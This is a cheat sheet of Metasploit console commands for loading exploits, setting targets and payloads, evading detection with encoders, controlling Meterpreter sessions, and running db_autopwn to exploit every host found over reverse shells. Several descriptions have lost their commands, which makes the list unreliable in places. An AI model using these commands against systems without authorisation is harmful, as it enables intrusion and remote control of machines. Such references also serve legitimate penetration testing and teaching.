MSFconsole Commands Cheat Sheet

Here is a list with the most often used commands of Metasploit Framework console.

Metasploit Framework Console Commands List

show exploits

Show all exploits of the Metasploit Framework

show payloads

Show all payloads

show auxiliary

Show all auxiliary modules of the Metasploit Framework

search name

Search for exploits or modules


Load information about a specific exploit or module

use name

Load an exploit or module


Your local IP address if you are on the same network with the target or  the public IP address when you are not


The IP address of the target

set function

Set a specific value (for example RHOST or LHOST)

setg function

Set a specific value globally (for example RHOST or LHOST)

show options

Shows the options that are available for module or exploit

show targets

shows which platforms can be attacked by the exploit

set target num

specify a target index if you know the OS and the service pack

set payload payload

Specify the payload that it will be used

show advanced

Show advanced options

set autorunscript migrate -f

Automatically migrate a separate process upon exploit completion


Determine if the target is vulnerable to an attack


Execute the module or exploit and attack the target

exploit -j

Run the exploit under the context of the job

exploit -z

Do not interact with the session after successful exploitation

exploit -e encoder

specify the payload encoder to use (example:exploit -e shikata_ga_nai)

exploit -h

Display help for the exploit command

sessions -i

List available sessions

sessions -i -v

List all available sessions and show verbose fields,such as which vulnerability was used when exploiting the system

sessions -s script

Run a specific Meterpreter script on all Meterpreter live sessions

sessions -K

Kill all live sessions

sessions -c cmd

Execute a command on all live Meterpreter sessions

sessions -u sessionID

Upgrade a normal Win32 shell to a Meterpreter console

db_create name

Create a database to use with database-driven attacks (example:db_create autopwn)

db_connect name

Create and connect to a database for driven attacks (example:db_connect autopwn)


Use nmap and place results in database

db_autopwn -h

Display help for using db_autopwn

db_autopwn -p -r -e

Run db_autopwn against all ports found,use a reverse shell and exploit all systems


Delete the current database

db_destroy user:password@host:port/database

Delete database using advanced options